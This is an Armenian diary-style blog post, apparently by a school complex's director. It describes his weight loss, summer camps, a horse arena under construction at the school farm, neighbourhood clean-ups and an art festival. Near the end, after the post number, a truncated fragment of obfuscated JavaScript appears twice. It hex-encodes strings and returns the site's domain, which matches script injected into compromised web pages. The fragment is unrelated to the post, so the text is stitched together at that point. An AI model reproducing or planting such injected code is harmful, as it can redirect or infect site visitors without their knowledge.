Հավատացե՛ք իմ գրին, Մայր դպրոցի տարիների բուժքույր Արծվիկի կշեռքին, կրթահամալիրի տնօրենի գրասենյակի ղեկավար Լիլիթ Ազիզխանյանի արձանագրությանը… կշռվել էի, ինչպես խոստացել էի, ուղիղ մեկ ամիս առաջ՝ մայիսի 27-ին, և երեկ՝ հունիսի 27-ին, նույն շորերով բաց-հրապարակային կշռվեցի… Երկու կգ ևս մաշել եմ, թողել հեծանիվ+լող+վազքի՝ քայլքի-աշխույժի-առողջարար մարզականի եռանկյունում… Այսպիսի մի ամիս էլ, հուլիսը միշտ եղել է ամենաբլեյանական-աշխատանքային-եռուզեռային-ծավալային-նախագծայինը, ու ես վճռականորեն կհատեմ իննսունի սահմանը, ու …  դեպի իմ բաղձալի նշաձող։ Ասված է՝ կիլոգրամներն ավելորդ աշնանն են հաշվում՝ սեպտեմբերի 4-ին, որին, ի դեպ, պատրաստվում եմ ամեն օր… Միացե՛ք ինձ-մեզ, ինչպես Դպրոց-պարտեզի Սոնա Փափազյանի ընկերությունը… Կրթահամալիրյան Բանգլադեշի Բ-4 թաղամասում աշխատանքային աշխույժն այնքա՜ն զորեղացել ու Սեբաստացի ագարակի շուրջ պլեներային բարձունքի է հասել… Երեկ մեզ թաղի բնակիչ Անահիտ Բախշյանը միացավ, վաղը՝ համատիրության ղեկավար Մայիսը կմիանա… Էսպես որ գնա, Մալաթիա-Սեբաստիայի ղեկավար Արտակ Ալեքսանյանն էլ կարող է հետաքրքրվել իր թաղով… Այս ի՜նչ իրադարձություններ են զարգանում ամենաՀայաստանի ամենաթաղամասի ամենատարածքում…

Լուսանկարները՝ Զարուհի Առաքելյանի:

Երեկ Սոնայի ընկերությունն ի ցույց դրեց թիվ երեսունութ շենքին՝ նույն շենքի դիմացի տարածքից հավաքած պարկերով շինաղբը… Չե՛նք թողնի՝ աղտոտեք, մի՜շտ մաքուր ենք պահելու ու առաջ ենք գնալու. սա է մեր պատասխանը կրթահամալիրի Բանգլադեշով մեկ…

Երեկ մեր ծովերում էին ոչ միայն բոլոր երկուսից տասը տարեկան ճամբարականները, հունիսիկները, Միջին դպրոցի մուտքի ճամբարականները, սա բնական-հասկանալի առօրյա է, երեկ Գեղարվեստի ծով մտան Ավագ դպրոցի մուտքի ճամբարի խիզախ աղջիկները՝ Կիրակոսյան Սոնա-Աննա քույրիկները, Գիսանեն, Շուշան Եփրիկյանը… Գեղարվեստի «Վաննա լճում» լող էր տալիս հայտնի լուսանկարիչ Մարինե Մկրտչյանը, իսկ այդ նույն ժամանակ Սևանա ծովում էին ռազմամարզական խաղերի հաղթողները. հայոց բանակի դեսանտայինների հետ ցուցադրական ուսումնավարժական հավաք են անցկացնում: Գնդապետ Մինասյանին և ավագ լեյտենանտ Վարդանյանին ողջո՛ւյն։

Մանկավարժության ճամբարականների լողի պարապմունք:
Լուսանկարները՝ Նունե Խաչիկօղլյանի:

Երեկ Գեղարոտից Սեբաստիա ագարակ հասան ձիավարժարանի մանեժի առաջին բեռնատարները ավազով՝ Պաշտպանության նախարարության նվերը ձիավարժարանին… Սկսվեց մանեժի կառուցումը…

Երեկ, ուշ երեկոյան, ես արտակարգ խորհրդակցություն էի անցկացնում ագարակում, նաև մեր գերմանացի գործընկերների մասնակցությամբ… Թափ, էլի թափ, հուլիսին ձիու վրա, ասել եմ, իմ տարիքում՝ հեծանվով, ձիով, ծովով, արտով՝ նոր բարձունքներ… Եվ երգով, իհարկե:

Երեկ Արենը վճռականորեն սկսեց ձիանոցի ձևավորումը… Շահնազարյանն այսպիսին է, իր կենսագրությունում ունի հեծանվի ակումբ, Կրթական պարտեզի մեծ պուրակը, հիմա էլ՝ ագարակի ձիանոցը… Երեկ ագարակի տարածք թեթև-ուրախ քայլքով մտավ նաև տեխնոլոգ փորձառու Թամար Հարությունյանը՝ իր հմուտ սանուհիների խմբով… Իմ օրվա հունձքը քանի՜ իշաբեռ կլինի՝ հարցնում եմ. գրիս անընդհատությունն այստեղից է գալիս, անսպառ բանից, ճիգից…

Նոր դպրոցի «Հունիսիկ» նախագիծը:
Լուսանկարները՝ Նունե Խաչիկօղլյանի:

Իմ սեղանին հիմա Ավետիք Իսահակյանի «Ուստա Կարոն» վեպն է. ընթեցողը հարցնում է՝ պատասխանում եմ… Իմացա, որ լույս է տեսել վեպի նոր, ամբողջական հրատարակությունը… Կուզեմ՝ սեղանիս լինի… Այս կերպարում հիմա ես մոռացած պատկերներ եմ որոնում… թե՛ Ախուրյանի, ուստա Կարոյի և թե՛ իր ժամանակի, կգտնեմ, կգրեմ՝ կիամանք…

Երեկ օրվա վերջում հաստատեցի Բանգլադեշյան Պլեներ 2016-ի փառատոն-ստուգատեսների  մրցանակակիրների ստուգատեսների ղեկավարների ներկայացրած անունները… Տպավորիչ ցանկ ստացվեց… Աշխույժ էր մեր պլեները, մարդաշատ՝ հունիսյան հարթակները պլեների, և լավ է, որ իմ ցանկությամբ պլեների մրցանակակիրների հավաքը, որպես մի պլեներային պարապմունք-հավաք, Անգլիական այգում է այսօր նշանակված… 2017-ին կմտնենք Զանգվի ձոր, իսկ 2018-ին՝ Ախուրյանի… Ի՞նչ եմ կորցրել Ախուրյանի գետի հովիտներում, որ այս գիշերով, տեսեք, փնտրում եմ… Կգտնեմ՝ կիմանաք, բայց հանդիպման մեր վայրերը եկեք չփոխենք:

2-5 տարեկանների ֆոտոսեսիա:
Լուսանկարները` Զարուհի Առաքելյանի:

Երեկ Գեղարվեստի թատրոնի դահլիճում ես ունկնդրում էի Արփի Սահակյանին… Մի դերասանի թատրոն՝ այս անգամ սեփական ստեղծագործությամբ… Օրեր առաջ այս դահլիճում հետևում էի Ավագ դպրոցի Զարուհի Հովսեփյանի աշխատանքին… Լավ ուսումնական նախագծային շարք է մտահղացել-իրագործում Քնարիկ Ներսիսյանը. ամառային անհատական աշխատանքը անհատականության ձևավորման գործուն միջոց է… Ես իմ օրագրում հաճույքով կանդրադառնամ այսպիսի նախագծերի՝ ամառային, որ ընթացքի մեջ են…

Իսկ Քնարիկի ու քանդակագործ Աշոտ Երիցյանի հետ գտանք նրա հուլիսյան աշխատանքի բովանդակությունն ու ձևը՝ ուղղված այս սեպտեմբերին, որ Աշոտը 2016-2017 տարվա մեկնարկին, ունենա, ստեղծած լինի իր աշխատանքը… Այնքա՜ն «անգլիական» այգիներ կան մեր Բանգլադեշում, ինչո՞ւ այս այգիներում բակային չկազմակերպել կերպարվեստի պլեներային պարապմունքներ. թաղի նկարչորեն օժտվածներից հենց այսպիսով ստեղծել ընկերությունները… Սոնա Փափազյանը, ախր, մանկավարժական գյուտ արեց իր նախագծով… Վարակեմ Աշոտին, Բելոռուսով մեզ զարմացնող Հասմիկ Թոփչյանին, եղբոր հարսանիքից վերադարձող Զառային Ոսկանյան… Բոլորին… Աշունը հունձք ժողովելու ժամանակ է, ամառը՝ հունձք անելու… Մի՛ ուշացրեք, մի՛ սպասեք, սկսե՛ք… Իրեն իրեն եկավ.

Հունձք կժողվեմ մանգաղով,
-Լուսնակը յարս է –
Ակոս ակոս ման գալով:
-Սիրածս հարս է:
Դանիել Վարուժան

Լուսանկաները՝ Նունե Խաչիկօղլյանի:

Ֆոտոխմբագիր՝ Զարուհի Առաքելյան
# 715

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Հա´մ, հա´մ, հա´մ, քանի՞ ժամ, ախպեր, ես էսպես մնամ…

Ամեն ինչն է կարևոր, բայց ամենակարևորը… արհեստն է: Սա, իհարկե, մեր իրականությունից չէ, այլ սերբական հեքիաթից, որ կարող եք կարդալ մեր կրթահամալիրի Բանգլադեշյան «Արհեստագործ» ամսագրում… Քանի՞ հոգի ունի ամենակարևորի՝ կարևորի

Անձանձրույթ-ուրախ կիրակի` Դավթի պարգևած․․․

Ես հիմա ավելի հաճախ-պարբերական եմ մոտենում Դավիթ Բլեյանին, երբ քնած է: Հենց զարթնում եմ, երբ հարկ է իրեն արթնացնել-անկողնուց հանել․․․ Երկարել է մեր հերոսը. բա՜ց, ներքնակի վրա փռված, իր բոյը,

Ես ձեր կողքին, այո՛, բայց որպես շանթարգել…

Դավիթ Բլեյանը շարունակում է հավեսով ճամբարականի իր կյանքը. ամեն առավոտ վաղ արթնանում է, արդեն ինքնուրույն կանգնում ցնցուղի տակ, իրեն-իրեն խոսում, մինչև գալիս է ամենապահը երկուսիս համար։ Ես սրբիչով կամ Ֆրիդա